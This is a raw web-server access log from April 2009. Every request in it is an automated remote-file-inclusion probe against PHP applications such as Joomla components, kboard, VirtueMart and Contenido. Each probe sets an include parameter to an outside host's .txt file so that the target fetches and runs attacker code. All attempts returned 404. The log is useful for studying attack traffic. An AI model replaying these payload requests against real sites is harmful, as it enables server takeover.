67.212.165.114 - - [17/Apr/2009:11:09:20 -0500] "GET /logs//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:20 -0500] "GET //admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:20 -0500] "GET /logs/access_log.1233014400//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:23 -0500] "GET /logs/access_log.1235174400//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:35 -0500] "GET //admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:35 -0500] "GET /logs//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:35 -0500] "GET /logs/access_log.1233014400//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:51 -0500] "GET /logs/access_log.1231200000//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:09:57 -0500] "GET /logs/access_log.1231200000//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:11:06 -0500] "GET /logs/access_log.1231545600//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:11:06 -0500] "GET /logs/access_log.1233187200//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:11:09 -0500] "GET /logs/access_log.1233187200//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:11:11:10 -0500] "GET /logs/access_log.1231545600//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
69.48.134.176 - - [17/Apr/2009:11:12:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
69.48.134.176 - - [17/Apr/2009:11:12:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
93.164.123.218 - - [17/Apr/2009:11:12:29 -0500] "GET /logs/access_log.1235174400//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:33 -0500] "GET /logs//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:33 -0500] "GET //admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:35 -0500] "GET /logs/access_log.1233014400//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:43 -0500] "GET /logs/access_log.1231200000//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:50 -0500] "GET /logs/access_log.1235174400//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:55 -0500] "GET //admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:55 -0500] "GET /logs//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:12:56 -0500] "GET /logs/access_log.1233014400//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:17:12 -0500] "GET /logs/access_log.1231545600//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:17:12 -0500] "GET /logs/access_log.1233187200//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:17:28 -0500] "GET /logs/access_log.1231200000//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.94.214.98 - - [17/Apr/2009:11:17:39 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:17:39 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:17:39 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:17:39 -0500] "GET /logs/access_log.1229299200//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [17/Apr/2009:11:20:01 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
209.172.33.230 - - [17/Apr/2009:11:20:01 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
209.172.33.230 - - [17/Apr/2009:11:20:01 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
121.165.73.157 - - [17/Apr/2009:11:20:50 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.165.73.157 - - [17/Apr/2009:11:20:50 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.165.73.157 - - [17/Apr/2009:11:20:50 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.94.214.98 - - [17/Apr/2009:11:21:15 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:21:18 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:21:18 -0500] "GET //config/dbutil.bck.php?confdir=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:21:18 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:21:18 -0500] "GET /logs/access_log.1235260800//config/dbutil.bck.php?confdir=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
93.164.123.218 - - [17/Apr/2009:11:21:47 -0500] "GET /logs/access_log.1231545600//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:11:21:48 -0500] "GET /logs/access_log.1233187200//admin/common.inc.php?base_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
207.191.230.44 - - [17/Apr/2009:11:24:49 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:49 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:49 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:51 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:51 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:51 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:54 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:24:54 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:25:10 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:25:10 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:25:16 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:25:37 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:25:37 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:25:37 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.230 - - [17/Apr/2009:11:25:48 -0500] "GET /logs/access_log.1228608000%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
207.191.230.44 - - [17/Apr/2009:11:25:55 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:25:58 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.191.230.44 - - [17/Apr/2009:11:26:01 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
148.245.102.115 - - [17/Apr/2009:11:26:42 -0500] "GET //guestbook1//admin.php?include_path=http://homeartliving.dk/modules/idv6.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
148.245.102.115 - - [17/Apr/2009:11:26:42 -0500] "GET /logs//guestbook1//admin.php?include_path=http://homeartliving.dk/modules/idv6.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.13 - - [17/Apr/2009:11:27:07 -0500] "GET /logs/index2.php?meio=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:11:27:07 -0500] "GET /index2.php?meio=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.13 - - [17/Apr/2009:11:27:14 -0500] "GET /logs/access_log.1238112000/index2.php?meio=http://www.ohnnurychurch.org/bbs/nyot/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.94.214.98 - - [17/Apr/2009:11:27:19 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.165.73.157 - - [17/Apr/2009:11:29:23 -0500] "GET /logs/access_log.1228608000%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
211.43.212.111 - - [17/Apr/2009:11:30:25 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:11:30:25 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:11:30:25 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:31:30 -0500] "GET /logs/access_log.1238112000//ashnews.php?pathtoashnews=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:31:30 -0500] "GET /logs//ashnews.php?pathtoashnews=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.43.77.59 - - [17/Apr/2009:11:31:30 -0500] "GET //ashnews.php?pathtoashnews=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:32:07 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:32:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:32:08 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:32:25 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
85.236.53.4 - - [17/Apr/2009:11:33:53 -0500] "GET /logs/errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
85.236.53.4 - - [17/Apr/2009:11:33:53 -0500] "GET /errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
66.36.242.84 - - [17/Apr/2009:11:34:50 -0500] "GET /logs/errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.36.242.84 - - [17/Apr/2009:11:34:50 -0500] "GET /errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
88.191.89.65 - - [17/Apr/2009:11:36:06 -0500] "GET /logs/bbs/skin/zero_vote/setup.php?dir=http://hredu.net/bbs/skin/zero_vote/images/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
88.191.89.65 - - [17/Apr/2009:11:36:06 -0500] "GET /bbs/skin/zero_vote/setup.php?dir=http://hredu.net/bbs/skin/zero_vote/images/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
66.230.213.52 - - [17/Apr/2009:11:37:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:37:10 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:37:11 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.230.213.52 - - [17/Apr/2009:11:37:46 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.64.230.12 - - [17/Apr/2009:11:39:09 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
208.64.230.12 - - [17/Apr/2009:11:39:09 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
200.43.77.59 - - [17/Apr/2009:11:39:55 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://bergeteufel.de//bergen/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.236.223.50 - - [17/Apr/2009:11:40:08 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.236.223.50 - - [17/Apr/2009:11:40:11 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.236.223.50 - - [17/Apr/2009:11:40:11 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.236.223.50 - - [17/Apr/2009:11:40:54 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.140.232.216 - - [17/Apr/2009:11:41:07 -0500] "GET /logs/errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.140.232.216 - - [17/Apr/2009:11:41:07 -0500] "GET /errors.php?error=http://www.lyscanh1.xpg.com.br/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.130.244.44 - - [17/Apr/2009:11:41:48 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.130.244.44 - - [17/Apr/2009:11:41:49 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:26 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:26 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:31 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:32 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:49 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:43:50 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
217.130.244.44 - - [17/Apr/2009:11:44:06 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
217.130.244.44 - - [17/Apr/2009:11:44:06 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:44:11 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:44:11 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
203.147.62.92 - - [17/Apr/2009:11:45:04 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
203.147.62.92 - - [17/Apr/2009:11:45:04 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
203.147.62.92 - - [17/Apr/2009:11:45:05 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
203.147.62.92 - - [17/Apr/2009:11:45:05 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
140.114.61.100 - - [17/Apr/2009:11:46:23 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sumsel.polri.go.id/intel/._private//mbonx/rr.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
140.114.61.100 - - [17/Apr/2009:11:46:23 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sumsel.polri.go.id/intel/._private//mbonx/rr.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:11:46:43 -0500] "GET /errors.php?error=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:11:46:43 -0500] "GET /logs/errors.php?error=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:11:46:44 -0500] "GET /logs/errors.php?error=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:11:46:44 -0500] "GET /errors.php?error=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:47:01 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:47:02 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:47:02 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:11:47:02 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
208.64.230.12 - - [17/Apr/2009:11:47:42 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.825"
208.64.230.12 - - [17/Apr/2009:11:47:42 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
